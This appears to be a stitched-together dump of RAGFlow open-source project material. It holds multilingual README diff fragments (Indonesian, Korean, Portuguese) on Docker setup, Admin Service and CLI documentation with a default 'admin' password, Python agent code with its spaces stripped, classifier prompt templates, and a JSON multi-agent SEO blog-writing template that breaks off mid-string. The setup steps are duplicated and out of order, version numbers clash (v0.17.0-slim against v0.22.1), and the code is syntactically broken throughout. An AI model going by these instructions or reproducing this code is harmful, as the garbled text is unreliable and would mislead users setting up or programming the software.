> Perintah di bawah ini mengunduh edisi v0.22.1 dari gambar Docker RAGFlow. Silakan merujuk ke tabel berikut untuk deskripsi berbagai edisi RAGFlow. Untuk mengunduh edisi RAGFlow yang berbeda dari v0.22.1, perbarui variabel RAGFLOW_IMAGE di docker/.env sebelum menggunakan docker compose untuk memulai server.
```bash
$ cd ragflow/docker
# git checkout v0.22.1
# Opsional: gunakan tag stabil (lihat releases: https://github.com/infiniflow/ragflow/releases)
# This steps ensures the **entrypoint.sh** file in the code matches the Docker image version.
# Use CPU for DeepDoc tasks:
$ docker compose -f docker-compose.yml up -d
```
| RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
[RAGFlow](https://ragflow.io/)는 심층 문서 이해에 기반한 오픈소스 RAG(Retrieval-Augmented Generation) 엔진입니다. 이 엔진은 대규모 언어 모델(LLM)과 결합하여 정확한 질문 응답 기능을 제공하며, 다양한 복잡한 형식의 데이터에서 신뢰할 수 있는 출처를 바탕으로 한 인용을 통해 이를 뒷받침합니다. RAGFlow는 규모에 상관없이 모든 기업에 최적화된 RAG 워크플로우를 제공합니다.
[RAGFlow](https://ragflow.io/) 는 최첨단 RAG(Retrieval-Augmented Generation)와 Agent 기능을 융합하여 대규모 언어 모델(LLM)을 위한 우수한 컨텍스트 계층을 생성하는 선도적인 오픈소스 RAG 엔진입니다. 모든 규모의 기업에 적용 가능한 효율적인 RAG 워크플로를 제공하며, 통합 컨텍스트 엔진과 사전 구축된 Agent 템플릿을 통해 개발자들이 복잡한 데이터를 예외적인 효율성과 정밀도로 고급 구현도의 프로덕션 준비 완료 AI 시스템으로 변환할 수 있도록 지원합니다.
> 로컬 머신(Windows, Mac, Linux)에 Docker가 설치되지 않은 경우, [Docker 엔진 설치](<(https://docs.docker.com/engine/install/)>)를 참조하세요.
- [gVisor](https://gvisor.dev/docs/user_guide/install/): RAGFlow의 코드 실행기(샌드박스) 기능을 사용하려는 경우에만 필요합니다.
> [!TIP]
> 로컬 머신(Windows, Mac, Linux)에 Docker가 설치되지 않은 경우, [Docker 엔진 설치](<(https://docs.docker.com/engine/install/)>)를 참조하세요.
### 🚀 서버 시작하기
@ -147,24 +165,40 @@
3. 미리 빌드된 Docker 이미지를 생성하고 서버를 시작하세요:
> 아래 명령어는 RAGFlow Docker 이미지의 v0.17.0-slim 버전을 다운로드합니다. 다양한 RAGFlow 버전에 대한 설명은 다음 표를 참조하십시오. v0.17.0-slim과 다른 RAGFlow 버전을 다운로드하려면, docker/.env 파일에서 RAGFLOW_IMAGE 변수를 적절히 업데이트한 후 docker compose를 사용하여 서버를 시작하십시오. 예를 들어, 전체 버전인 v0.17.0을 다운로드하려면 RAGFLOW_IMAGE=infiniflow/ragflow:v0.17.0로 설정합니다.
> [!CAUTION]
> 모든 Docker 이미지는 x86 플랫폼을 위해 빌드되었습니다. 우리는 현재 ARM64 플랫폼을 위한 Docker 이미지를 제공하지 않습니다.
> ARM64 플랫폼을 사용 중이라면, [시스템과 호환되는 Docker 이미지를 빌드하려면 이 가이드를 사용해 주세요](https://ragflow.io/docs/dev/build_docker_image).
> 아래 명령어는 RAGFlow Docker 이미지의 v0.22.1 버전을 다운로드합니다. 다양한 RAGFlow 버전에 대한 설명은 다음 표를 참조하십시오. v0.22.1과 다른 RAGFlow 버전을 다운로드하려면, docker/.env 파일에서 RAGFLOW_IMAGE 변수를 적절히 업데이트한 후 docker compose를 사용하여 서버를 시작하십시오.
```bash
$ cd ragflow/docker
# git checkout v0.22.1
# Optional: use a stable tag (see releases: https://github.com/infiniflow/ragflow/releases)
# 이 단계는 코드의 entrypoint.sh 파일이 Docker 이미지 버전과 일치하도록 보장합니다.
# Use CPU for DeepDoc tasks:
$ docker compose -f docker-compose.yml up -d
```
| RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
[RAGFlow](https://ragflow.io/) é um mecanismo RAG (Geração Aumentada por Recuperação) de código aberto baseado em entendimento profundo de documentos. Ele oferece um fluxo de trabalho RAG simplificado para empresas de qualquer porte, combinando LLMs (Modelos de Linguagem de Grande Escala) para fornecer capacidades de perguntas e respostas verídicas, respaldadas por citações bem fundamentadas de diversos dados complexos formatados.
[RAGFlow](https://ragflow.io/) é um mecanismo de RAG (Retrieval-Augmented Generation) open-source líder que fusiona tecnologias RAG de ponta com funcionalidades Agent para criar uma camada contextual superior para LLMs. Oferece um fluxo de trabalho RAG otimizado adaptável a empresas de qualquer escala. Alimentado por um motor de contexto convergente e modelos Agent pré-construídos, o RAGFlow permite que desenvolvedores transformem dados complexos em sistemas de IA de alta fidelidade e pronto para produção com excepcional eficiência e precisão.
## 🎮 Demo
Experimente nossa demo em [https://demo.ragflow.io](https://demo.ragflow.io).
@ -133,80 +148,99 @@ Experimente nossa demo em [https://demo.ragflow.io](https://demo.ragflow.io).
- RAM >= 16 GB
- Disco >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
> Se você não instalou o Docker na sua máquina local (Windows, Mac ou Linux), veja [Instalar Docker Engine](https://docs.docker.com/engine/install/).
- [gVisor](https://gvisor.dev/docs/user_guide/install/): Necessário apenas se você pretende usar o recurso de executor de código (sandbox) do RAGFlow.
> [!TIP]
> Se você não instalou o Docker na sua máquina local (Windows, Mac ou Linux), veja [Instalar Docker Engine](https://docs.docker.com/engine/install/).
### 🚀 Iniciar o servidor
1. Certifique-se de que `vm.max_map_count` >= 262144:
1. Certifique-se de que `vm.max_map_count` >= 262144:
> Para verificar o valor de `vm.max_map_count`:
>
> ```bash
> $ sysctl vm.max_map_count
> ```
>
> Se necessário, redefina `vm.max_map_count` para um valor de pelo menos 262144:
>
> ```bash
> # Neste caso, defina para 262144:
> $ sudo sysctl -w vm.max_map_count=262144
> ```
>
> Essa mudança será resetada após a reinicialização do sistema. Para garantir que a alteração permaneça permanente, adicione ou atualize o valor de `vm.max_map_count` em **/etc/sysctl.conf**:
>
> ```bash
> vm.max_map_count=262144
> ```
> Para verificar o valor de `vm.max_map_count`:
>
> ```bash
> $ sysctl vm.max_map_count
> ```
>
> Se necessário, redefina `vm.max_map_count` para um valor de pelo menos 262144:
>
> ```bash
> # Neste caso, defina para 262144:
> $ sudo sysctl -w vm.max_map_count=262144
> ```
>
> Essa mudança será resetada após a reinicialização do sistema. Para garantir que a alteração permaneça permanente, adicione ou atualize o valor de `vm.max_map_count` em **/etc/sysctl.conf**:
> Todas as imagens Docker são construídas para plataformas x86. Atualmente, não oferecemos imagens Docker para ARM64.
> Se você estiver usando uma plataforma ARM64, por favor, utilize [este guia](https://ragflow.io/docs/dev/build_docker_image) para construir uma imagem Docker compatível com o seu sistema.
3. Inicie o servidor usando as imagens Docker pré-compiladas:
> O comando abaixo baixa a edição`v0.22.1` da imagem Docker do RAGFlow. Consulte a tabela a seguir para descrições de diferentes edições do RAGFlow. Para baixar uma edição do RAGFlow diferente da `v0.22.1`, atualize a variável `RAGFLOW_IMAGE` conforme necessário no **docker/.env** antes de usar `docker compose` para iniciar o servidor.
> O comando abaixo baixa a edição `v0.17.0-slim` da imagem Docker do RAGFlow. Consulte a tabela a seguir para descrições de diferentes edições do RAGFlow. Para baixar uma edição do RAGFlow diferente da `v0.17.0-slim`, atualize a variável `RAGFLOW_IMAGE` conforme necessário no **docker/.env** antes de usar `docker compose` para iniciar o servidor. Por exemplo: defina `RAGFLOW_IMAGE=infiniflow/ragflow:v0.17.0` para a edição completa `v0.17.0`.
```bash
$ cd ragflow/docker
```bash
$ cd ragflow/docker
$ docker compose -f docker-compose.yml up -d
```
# git checkout v0.22.1
# Opcional: use uma tag estável (veja releases: https://github.com/infiniflow/ragflow/releases)
# Esta etapa garante que o arquivo entrypoint.sh no código corresponda à versão da imagem do Docker.
| Tag da imagem RAGFlow | Tamanho da imagem (GB) | Possui modelos de incorporação? | Estável? |
> A partir da `v0.22.0`, distribuímos apenas a edição slim e não adicionamos mais o sufixo **-slim** às tags das imagens.
* Rodando em todos os endereços (0.0.0.0)
```
4. Verifique o status do servidor após tê-lo iniciado:
> Se você pular essa etapa de confirmação e acessar diretamente o RAGFlow, seu navegador pode exibir um erro `network anormal`, pois, nesse momento, seu RAGFlow pode não estar totalmente inicializado.
```bash
$ docker logs -f docker-ragflow-cpu-1
```
5. No seu navegador, insira o endereço IP do seu servidor e faça login no RAGFlow.
_O seguinte resultado confirma o lançamento bem-sucedido do sistema:_
> Com as configurações padrão, você só precisa digitar `http://IP_DO_SEU_MÁQUINA` (**sem** o número da porta), pois a porta HTTP padrão `80` pode ser omitida ao usar as configurações padrão.
```bash
____ ___ ______ ______ __
/ __ \ / | / ____// ____// /____ _ __
/ /_/ // /| | / / __ / /_ / // __ \| | /| / /
/ _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
/_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
6. Em [service_conf.yaml.template](./docker/service_conf.yaml.template), selecione a fábrica LLM desejada em `user_default_llm` e atualize o campo `API_KEY` com a chave de API correspondente.
* Rodando em todos os endereços (0.0.0.0)
```
> Consulte [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) para mais informações.
> Se você pular essa etapa de confirmação e acessar diretamente o RAGFlow, seu navegador pode exibir um erro `network anormal`, pois, nesse momento, seu RAGFlow pode não estar totalmente inicializado.
>
5. No seu navegador, insira o endereço IP do seu servidor e faça login no RAGFlow.
> Com as configurações padrão, você só precisa digitar `http://IP_DO_SEU_MÁQUINA` (**sem** o número da porta), pois a porta HTTP padrão `80` pode ser omitida ao usar as configurações padrão.
>
6. Em [service_conf.yaml.template](./docker/service_conf.yaml.template), selecione a fábrica LLM desejada em `user_default_llm` e atualize o campo `API_KEY` com a chave de API correspondente.
> Consulte [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) para mais informações.
>
_O show está no ar!_
@ -237,9 +271,9 @@ O RAGFlow usa o Elasticsearch por padrão para armazenar texto completo e vetore
```bash
$ docker compose -f docker/docker-compose.yml down -v
```
Note: `-v` irá deletar os volumes do contêiner, e os dados existentes serão apagados.
2. Defina `DOC_ENGINE` no **docker/.env** para `infinity`.
3. Inicie os contêineres:
```bash
@ -247,44 +281,34 @@ O RAGFlow usa o Elasticsearch por padrão para armazenar texto completo e vetore
```
> [!ATENÇÃO]
> A mudança para o Infinity em uma máquina Linux/arm64 ainda não é oficialmente suportada.
> A mudança para o Infinity em uma máquina Linux/arm64 ainda não é oficialmente suportada.
## 🔧 Criar uma imagem Docker sem modelos de incorporação
## 🔧 Criar uma imagem Docker
Esta imagem tem cerca de 2 GB de tamanho e depende de serviços externos de LLM e incorporação.
Admin Service is a dedicated management component designed to monitor, maintain, and administrate the RAGFlow system. It provides comprehensive tools for ensuring system stability, performing operational tasks, and managing users and permissions efficiently.
The service offers real-time monitoring of critical components, including the RAGFlow server, Task Executor processes, and dependent services such as MySQL, Infinity, Elasticsearch, Redis, and MinIO. It automatically checks their health status, resource usage, and uptime, and performs restarts in case of failures to minimize downtime.
For user and system management, it supports listing, creating, modifying, and deleting users and their associated resources like knowledge bases and Agents.
Built with scalability and reliability in mind, the Admin Service ensures smooth system operation and simplifies maintenance workflows.
It consists of a server-side Service and a command-line client (CLI), both implemented in Python. User commands are parsed using the Lark parsing toolkit.
- **Admin Service**: A backend service that interfaces with the RAGFlow system to execute administrative operations and monitor its status.
- **Admin CLI**: A command-line interface that allows users to connect to the Admin Service and issue commands for system management.
### Starting the Admin Service
#### Launching from source code
1. Before start Admin Service, please make sure RAGFlow system is already started.
2. Launch from source code:
```bash
python admin/server/admin_server.py
```
The service will start and listen for incoming connections from the CLI on the configured port.
#### Using docker image
1. Before startup, please configure the `docker_compose.yml` file to enable admin server:
```bash
command:
- --enable-adminserver
```
2. Start the containers, the service will start and listen for incoming connections from the CLI on the configured port.
### Using the Admin CLI
1. Ensure the Admin Service is running.
2. Install ragflow-cli.
```bash
pip install ragflow-cli==0.22.1
```
3. Launch the CLI client:
```bash
ragflow-cli -h 127.0.0.1 -p 9381
```
You will be prompted to enter the superuser's password to log in.
The default password is admin.
**Parameters:**
- -h: RAGFlow admin server host address
- -p: RAGFlow admin server port
## Supported Commands
Commands are case-insensitive and must be terminated with a semicolon (`;`).
### Service Management Commands
- `LIST SERVICES;`
- Lists all available services within the RAGFlow system.
- `SHOW SERVICE <id>;`
- Shows detailed status information for the service identified by `<id>`.
### User Management Commands
- `LIST USERS;`
- Lists all users known to the system.
- `SHOW USER '<username>';`
- Shows details and permissions for the specified user. The username must be enclosed in single or double quotes.
- `CREATE USER <username><password>;`
- Create user by username and password. The username and password must be enclosed in single or double quotes.
- `DROP USER '<username>';`
- Removes the specified user from the system. Use with caution.
- `ALTER USER PASSWORD '<username>' '<new_password>';`
- Changes the password for the specified user.
- `ALTER USER ACTIVE <username><on/off>;`
- Changes the user to active or inactive.
### Data and Agent Commands
- `LIST DATASETS OF '<username>';`
- Lists the datasets associated with the specified user.
- `LIST AGENTS OF '<username>';`
- Lists the agents associated with the specified user.
### Meta-Commands
Meta-commands are prefixed with a backslash (`\`).
-`\?` or `\help`
- Shows help information for the available commands.
pub='-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArq9XTUSeYr2+N1h3Afl/z8Dse/2yD0ZGrKwx+EEEcdsBLca9Ynmx3nIB5obmLlSfmskLpBo0UACBmB5rEjBp2Q2f3AG3Hjd4B+gNCG6BDaawuDlgANIhGnaTLrIqWrrcm4EMzJOnAOI1fgzJRsOOUEfaS318Eq9OVO3apEyCCt0lOQK6PuksduOjVxtltDav+guVAA068NrPYmRNabVKRNLJpL8w4D44sfth5RvZ3q9t+6RTArpEtc5sh5ChzvqPOzKGMXW83C95TxmXqpbK6olN4RevSfVjEAgCydH6HN6OhtOQEcnrU97r9H0iZOWwbw3pVrZiUkuRD1R56Wzs2wIDAQAB\n-----END PUBLIC KEY-----'
description="Admin Service's client of [RAGFlow](https://github.com/infiniflow/ragflow). The Admin Service provides user management and system monitoring. "
# self.toolcall_session.get_tool_obj(name).add2system_prompt(f"The chat history with other agents are as following: \n" + self.get_useful_memory(user_request, str(args["user_prompt"]),user_defined_prompt))
raiseTypeError(f"List should be returned, but `{functions}`")
forfinfunctions:
ifnotisinstance(f,dict):
raiseTypeError(f"An object type should be returned, but `{f}`")
withThreadPoolExecutor(max_workers=5)asexecutor:
thr=[]
forfuncinfunctions:
name=func["name"]
args=func["arguments"]
ifname==COMPLETE_TASK:
append_user_content(hist,f"Respond with a formal answer. FORGET(DO NOT mention) about `{COMPLETE_TASK}`. The language for the response MUST be as the same as the first user request.\n")
logging.exception(msg=f"Wrong JSON argument format in LLM ReAct response: {e}")
e=f"\nTool call error, please correct the input parameter of response format and call it again.\n *** Exception ***\n{e}"
append_user_content(hist,str(e))
logging.warning(f"Exceed max rounds: {self._param.max_rounds}")
final_instruction=f"""
{user_request}
IMPORTANT: You have reached the conversation limit. Based on ALL the information and research you have gathered so far, please provide a DIRECT and COMPREHENSIVE final answer to the original request.
Instructions:
1. SYNTHESIZE all information collected during this conversation
2. Provide a COMPLETE response using existing data - do not suggest additional research
3. Structure your response as a FINAL DELIVERABLE, not a plan
4. If information is incomplete, state what you found and provide the best analysis possible with available data
5. DO NOT mention conversation limits or suggest further steps
6. Focus on delivering VALUE with the information already gathered
Respond immediately with your final comprehensive answer.
"""
ifself.check_if_canceled("Agent final instruction"):
You're a text classifier. You need to categorize the user’s questions into {} categories,
namely: {}
Here's description of each category:
{}
self.sys_prompt="""
You are an advanced classification system that categorizes user questions into specific types. Analyze the input question and classify it into ONE of the following categories:
{}
You could learn from the following examples:
{}
You could learn from the above examples.
Just mention the category names, no need for any additional words.
Here's description of each category:
-{}
---- Real Data ----
{}
""".format(
len(self.category_description.keys()),
"/".join(list(self.category_description.keys())),
"\n".join(descriptions),
"-".join(cate_lines),
chat_hist
---- Instructions ----
- Consider both explicit mentions and implied context
- Prioritize the most specific applicable category
- Return only the category name without explanations
return"⌛Give me a moment—starting from: \n\n"+re.sub(r"(User's query:|[\\]+)",'',msg[-1]['content'],flags=re.DOTALL)+"\n\nI’ll figure out our best next move."
"en":"This is a multi-agent version of the SEO blog generation workflow. It simulates a small team of AI “writers”, where each agent plays a specialized role — just like a real editorial team.",
"de":"Dies ist eine Multi-Agenten-Version des Workflows zur Erstellung von SEO-Blogs. Sie simuliert ein kleines Team von KI-„Autoren“, in dem jeder Agent eine spezielle Rolle übernimmt – genau wie in einem echten Redaktionsteam.",
"sys_prompt":"# Role\n\nYou are the **Lead Agent**, responsible for initiating the multi-agent SEO blog generation process. You will receive the user\u2019s topic and blog goal, interpret the intent, and coordinate the downstream writing agents.\n\n# Goals\n\n1. Parse the user's initial input.\n\n2. Generate a high-level blog intent summary and writing plan.\n\n3. Provide clear instructions to the following Sub_Agents:\n\n - `Outline Agent` \u2192 Create the blog outline.\n\n - `Body Agent` \u2192 Write all sections based on outline.\n\n - `Editor Agent` \u2192 Polish and finalize the blog post.\n\n4. Merge outputs into a complete, readable blog draft in Markdown format.\n\n# Input\n\nYou will receive:\n\n- Blog topic\n\n- Target audience\n\n- Blog goal (e.g., SEO, education, product marketing)\n\n# Output Format\n\n```markdown\n\n## Parsed Writing Plan\n\n- **Topic**: [Extracted from user input]\n\n- **Audience**: [Summarized from user input]\n\n- **Intent**: [Inferred goal and style]\n\n- **Blog Type**: [e.g., Tutorial / Informative Guide / Marketing Content]\n\n- **Long-tail Keywords**: \n\n - keyword 1\n\n - keyword 2\n\n - keyword 3\n\n - ...\n\n## Instructions for Outline Agent\n\nPlease generate a structured outline including H2 and H3 headings. Assign 1\u20132 relevant keywords to each section. Keep it aligned with the user\u2019s intent and audience level.\n\n## Instructions for Body Agent\n\nWrite the full content based on the outline. Each section should be concise (500\u2013600 words), informative, and optimized for SEO. Use `Tavily Search` only when additional examples or context are needed.\n\n## Instructions for Editor Agent\n\nReview and refine the combined content. Improve transitions, ensure keyword integration, and add a meta title + meta description. Maintain Markdown formatting.\n\n\n## Guides\n\n- Do not generate blog content directly.\n\n- Focus on correct intent recognition and instruction generation.\n\n- Keep communication to downstream agents simple, scoped, and accurate.\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
"temperature":"0.1",
"temperatureEnabled":true,
"tools":[
{
"component_name":"Agent",
"id":"Agent:SlickSpidersTurn",
"name":"Outline Agent",
"params":{
"delay_after_error":1,
"description":"Generates a clear and SEO-friendly blog outline using H2/H3 headings based on the topic, audience, and intent provided by the lead agent. Each section includes suggested keywords for optimized downstream writing.\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.3,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":2,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Balance",
"presencePenaltyEnabled":false,
"presence_penalty":0.2,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Outline Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your sole responsibility is to create a clear, well-structured, and SEO-optimized blog outline.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
"temperature":0.5,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.85,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
}
},
{
"component_name":"Agent",
"id":"Agent:IcyPawsRescue",
"name":"Body Agent",
"params":{
"delay_after_error":1,
"description":"Writes the full blog content section-by-section following the outline structure. It integrates target keywords naturally and uses Tavily Search only when additional facts or examples are needed.\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Body Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your job is to write the full blog content based on the outline created by the `OutlineWriter_Agent`.\n\n\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
}
},
{
"component_name":"Agent",
"id":"Agent:TenderAdsAllow",
"name":"Editor Agent",
"params":{
"delay_after_error":1,
"description":"Polishes and finalizes the entire blog post. Enhances clarity, checks keyword usage, improves flow, and generates a meta title and description for SEO. Operates after all sections are completed.\n\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":2,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Editor Agent**, the final agent in a multi-agent SEO blog writing workflow. You are responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n## Integration Responsibilities\n\n- Maintain alignment with Lead Agent's original intent and audience\n\n- Preserve the structure and keyword strategy from Outline Agent\n\n- Enhance and polish Body Agent's content without altering core information\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
}
},
"upstream":[
"begin"
]
},
"Message:ModernSwansThrow":{
"downstream":[],
"obj":{
"component_name":"Message",
"params":{
"content":[
"{Agent:LuckyApplesGrab@content}"
]
}
},
"upstream":[
"Agent:LuckyApplesGrab"
]
},
"begin":{
"downstream":[
"Agent:LuckyApplesGrab"
],
"obj":{
"component_name":"Begin",
"params":{
"enablePrologue":true,
"inputs":{},
"mode":"conversational",
"prologue":"Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
"prologue":"Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
},
"label":"Begin",
"name":"begin"
},
"dragging":false,
"id":"begin",
"measured":{
"height":48,
"width":200
},
"position":{
"x":38.19445084117184,
"y":183.9781832844475
},
"selected":false,
"sourcePosition":"left",
"targetPosition":"right",
"type":"beginNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"The user query is {sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Lead Agent**, responsible for initiating the multi-agent SEO blog generation process. You will receive the user\u2019s topic and blog goal, interpret the intent, and coordinate the downstream writing agents.\n\n# Goals\n\n1. Parse the user's initial input.\n\n2. Generate a high-level blog intent summary and writing plan.\n\n3. Provide clear instructions to the following Sub_Agents:\n\n - `Outline Agent` \u2192 Create the blog outline.\n\n - `Body Agent` \u2192 Write all sections based on outline.\n\n - `Editor Agent` \u2192 Polish and finalize the blog post.\n\n4. Merge outputs into a complete, readable blog draft in Markdown format.\n\n# Input\n\nYou will receive:\n\n- Blog topic\n\n- Target audience\n\n- Blog goal (e.g., SEO, education, product marketing)\n\n# Output Format\n\n```markdown\n\n## Parsed Writing Plan\n\n- **Topic**: [Extracted from user input]\n\n- **Audience**: [Summarized from user input]\n\n- **Intent**: [Inferred goal and style]\n\n- **Blog Type**: [e.g., Tutorial / Informative Guide / Marketing Content]\n\n- **Long-tail Keywords**: \n\n - keyword 1\n\n - keyword 2\n\n - keyword 3\n\n - ...\n\n## Instructions for Outline Agent\n\nPlease generate a structured outline including H2 and H3 headings. Assign 1\u20132 relevant keywords to each section. Keep it aligned with the user\u2019s intent and audience level.\n\n## 